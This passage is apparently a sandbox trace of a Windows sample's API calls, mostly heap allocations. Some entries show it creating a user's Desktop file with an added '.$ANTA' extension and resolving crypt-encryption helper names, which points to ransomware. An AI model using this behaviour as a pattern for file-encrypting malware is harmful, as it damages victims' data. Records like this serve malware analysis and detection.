returned 1 [0132.408] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4369cc0 | out: hHeap=0x1780000) returned 1 [0132.408] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27a0 | out: hHeap=0x1780000) returned 1 [0132.408] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad30 | out: hHeap=0x1780000) returned 1 [0132.408] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2790 | out: hHeap=0x1780000) returned 1 [0132.408] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac2c0 [0132.408] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10000) returned 0x499a008 [0132.408] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab50 [0132.408] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2880 [0132.408] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\uI6dJwkjdmY9\\Jk_T2yqTjjg2-B-HH.flv.$ANTA" (normalized: "c:\\users\\fd1hvy\\desktop\\ui6djwkjdmy9\\jk_t2yqtjjg2-b-hh.flv.$anta"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2a0 [0132.408] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc70 [0132.408] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caca0 [0132.408] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2800 [0132.408] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac40 | out: hHeap=0x1780000) returned 1 [0132.408] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabe0 | out: hHeap=0x1780000) returned 1 [0132.408] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab20 | out: hHeap=0x1780000) returned 1 [0132.409] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc48 | out: hHeap=0x1780000) returned 1 [0132.409] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0132.409] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0132.409] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27f0 [0132.409] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2870 [0132.409] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2810 [0132.409] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796e48 [0132.409] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2810 | out: hHeap=0x1780000) returned 1 [0132.409] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e48 | out: hHeap=0x1780000) returned 1 [0132.409] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2870 | out: hHeap=0x1780000) returned 1 [0132.409] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0132.409] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac6c0 [0132.409] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0132.409] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac6c0 | out: hHeap=0x1780000) returned 1 [0132.409] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0132.409] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac440 [0132.409] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0132.409] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2840 [0132.409] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc48 [0132.409] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabe0 [0132.409] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2870 [0132.409] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2870 | out: hHeap=0x1780000) returned 1 [0132.409] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad30 [0132.409] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28b0 [0132.409] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2790 [0132.409] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796de8 [0132.409] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796de8 | out: hHeap=0x1780000) returned 1 [0132.410] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2790 | out: hHeap=0x1780000) returned 1 [0132.410] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28b0 | out: hHeap=0x1780000) returned 1 [0132.410] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab20 [0132.410] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad48 [0132.410] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2790 [0132.410] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x100000) returned 0x1b8c020 [0132.412] SetFilePointerEx (in: hFile=0x258, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x144eca8 | out: lpNewFilePointer=0x0) returned 1 [0132.412] ReadFile (in: hFile=0x258, lpBuffer=0x43eba98, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x144ecd0, lpOverlapped=0x0 | out: lpBuffer=0x43eba98*, lpNumberOfBytesRead=0x144ecd0*=0x10000, lpOverlapped=0x0) returned 1 [0132.415] ReadFile (in: hFile=0x258, lpBuffer=0x43eba98, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x144ecd0, lpOverlapped=0x0 | out: lpBuffer=0x43eba98*, lpNumberOfBytesRead=0x144ecd0*=0x3c5b, lpOverlapped=0x0) returned 1 [0132.416] ReadFile (in: hFile=0x258, lpBuffer=0x43eba98, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x144ecd0, lpOverlapped=0x0 | out: lpBuffer=0x43eba98*, lpNumberOfBytesRead=0x144ecd0*=0x0, lpOverlapped=0x0) returned 1 [0132.416] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad48 | out: hHeap=0x1780000) returned 1 [0132.416] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2790 | out: hHeap=0x1780000) returned 1 [0132.416] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab20 | out: hHeap=0x1780000) returned 1 [0132.416] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28e0 [0132.416] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x13c5b) returned 0x49aa010 [0132.417] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1b8c020 | out: hHeap=0x1780000) returned 1 [0132.420] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabe0 | out: hHeap=0x1780000) returned 1 [0132.420] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad30 | out: hHeap=0x1780000) returned 1 [0132.420] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc48 | out: hHeap=0x1780000) returned 1 [0132.420] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2840 | out: hHeap=0x1780000) returned 1 [0132.420] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2790 [0132.420] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x13c5b) returned 0x49bdc78 [0132.421] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x49aa010 | out: hHeap=0x1780000) returned 1 [0132.421] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28e0 | out: hHeap=0x1780000) returned 1 [0132.421] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0132.421] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2920 [0132.421] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc48 [0132.421] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabe0 [0132.421] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2870 [0132.421] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2840 [0132.421] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x13c5b) returned 0x49aa010 [0132.422] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2870 | out: hHeap=0x1780000) returned 1 [0132.422] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x49aa010 | out: hHeap=0x1780000) returned 1 [0132.422] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2840 | out: hHeap=0x1780000) returned 1 [0132.422] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabe0 | out: hHeap=0x1780000) returned 1 [0132.422] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc48 | out: hHeap=0x1780000) returned 1 [0132.422] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2920 | out: hHeap=0x1780000) returned 1 [0132.422] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0132.422] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28c0 [0132.422] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27f0 [0132.422] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796fc8 [0132.422] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fc8 | out: hHeap=0x1780000) returned 1 [0132.422] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0132.422] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28c0 | out: hHeap=0x1780000) returned 1 [0132.422] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41abfc0 [0132.422] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0132.422] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2870 [0132.422] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27a0 [0132.422] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4392538 [0132.422] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0132.422] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4392538 | out: hHeap=0x1780000) returned 1 [0132.422] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27a0 | out: hHeap=0x1780000) returned 1 [0132.422] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc48 [0132.422] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2920 [0132.422] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc98 [0132.422] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad30 [0132.422] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27f0 [0132.422] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2840 [0132.422] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x13c5b) returned 0x49aa010 [0132.422] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0132.423] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e27f0 [0132.423] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac40 [0132.423] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27a0 [0132.423] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27a0 | out: hHeap=0x1780000) returned 1 [0132.423] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e27a0 [0132.423] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab80 [0132.423] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28f0 [0132.423] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28f0 | out: hHeap=0x1780000) returned 1 [0132.423] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2810 [0132.423] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac28 [0132.423] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2820 [0132.423] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2820 | out: hHeap=0x1780000) returned 1 [0132.423] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cac58 [0132.423] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd38 [0132.423] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac10 [0132.423] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2820 [0132.423] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad48 [0132.423] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2830 [0132.423] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x13c5b) returned 0x49d18e0 [0132.424] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd10 [0132.424] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabf8 [0132.424] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2860 [0132.424] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabf8 | out: hHeap=0x1780000) returned 1 [0132.424] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf8d8 [0132.424] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad60 [0132.424] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0030 [0132.425] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabf8 [0132.425] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2890 [0132.425] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad78 [0132.425] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfdd8 [0132.425] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab20 [0132.425] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28b0 [0132.425] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa90 [0132.425] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8be8 [0132.425] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0132.425] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28c0 [0132.425] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28c0 | out: hHeap=0x1780000) returned 1 [0132.425] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28c0 [0132.425] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28c0 | out: hHeap=0x1780000) returned 1 [0132.425] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac140 [0132.425] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0132.425] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfea0 [0132.425] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab68 [0132.425] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28c0 [0132.425] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab68 | out: hHeap=0x1780000) returned 1 [0132.425] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d01e8 [0132.425] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab68 [0132.425] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabb0 [0132.425] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28e0 [0132.425] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabb0 | out: hHeap=0x1780000) returned 1 [0132.426] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28f0 [0132.426] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a90b0 [0132.426] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0132.426] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a90b0 | out: hHeap=0x1780000) returned 1 [0132.426] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28f0 | out: hHeap=0x1780000) returned 1 [0132.426] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff40 [0132.426] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e28f0 [0132.426] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0120 [0132.426] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabb0 [0132.426] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2900 [0132.426] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2900 | out: hHeap=0x1780000) returned 1 [0132.426] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cabe0 [0132.426] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d00d0 [0132.426] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae20 [0132.426] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2900 [0132.426] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae20 | out: hHeap=0x1780000) returned 1 [0132.426] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfe00 [0132.426] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae38 [0132.426] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9218 [0132.426] PeekMessageW (in: lpMsg=0x144e63c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e63c) returned 0 [0132.426] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfef0 [0132.426] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf58 [0132.426] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29c0 [0132.426] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caeb0 [0132.427] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb048 [0132.427] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2970 [0132.427] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb048 | out: hHeap=0x1780000) returned 1 [0132.427] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0008 [0132.427] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb018 [0132.427] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2950 [0132.427] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caec8 [0132.427] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2950 | out: hHeap=0x1780000) returned 1 [0132.427] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1797008 [0132.427] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2b00 [0132.427] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf40 [0132.427] CharLowerBuffW (in: lpsz="uint", cchLength=0x4 | out: lpsz="uint") returned 0x4 [0132.427] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2bd8 [0132.427] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cafd0 [0132.427] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a70 [0132.427] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cafb8 [0132.427] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a30 [0132.427] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae50 [0132.427] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2940 [0132.427] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caee0 [0132.427] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2950 [0132.427] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caee0 | out: hHeap=0x1780000) returned 1 [0132.427] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2950 | out: hHeap=0x1780000) returned 1 [0132.427] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae50 | out: hHeap=0x1780000) returned 1 [0132.428] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2940 | out: hHeap=0x1780000) returned 1 [0132.428] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cafb8 | out: hHeap=0x1780000) returned 1 [0132.428] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a30 | out: hHeap=0x1780000) returned 1 [0132.428] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a50 [0132.428] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2ac0 [0132.428] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf40 | out: hHeap=0x1780000) returned 1 [0132.428] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b00 | out: hHeap=0x1780000) returned 1 [0132.428] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caec8 | out: hHeap=0x1780000) returned 1 [0132.428] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb018 | out: hHeap=0x1780000) returned 1 [0132.428] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0008 | out: hHeap=0x1780000) returned 1 [0132.428] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2970 | out: hHeap=0x1780000) returned 1 [0132.428] PeekMessageW (in: lpMsg=0x144e63c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e63c) returned 0 [0132.428] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff18 [0132.428] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cafb8 [0132.428] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a20 [0132.428] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cada8 [0132.428] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae80 [0132.428] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2ad0 [0132.428] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae80 | out: hHeap=0x1780000) returned 1 [0132.428] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfec8 [0132.428] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf70 [0132.428] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2ae0 [0132.428] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2ab0 [0132.428] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4392110 [0132.428] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0132.428] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4392110 | out: hHeap=0x1780000) returned 1 [0132.428] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ab0 | out: hHeap=0x1780000) returned 1 [0132.428] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cae98 [0132.429] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a90b0 [0132.429] PeekMessageW (in: lpMsg=0x144dfec, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144dfec) returned 0 [0132.429] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2950 [0132.429] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29f0 [0132.429] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29f0 | out: hHeap=0x1780000) returned 1 [0132.429] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2950 | out: hHeap=0x1780000) returned 1 [0132.429] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a90b0 | out: hHeap=0x1780000) returned 1 [0132.429] HeapFree (in: hHeap=0x1780000, 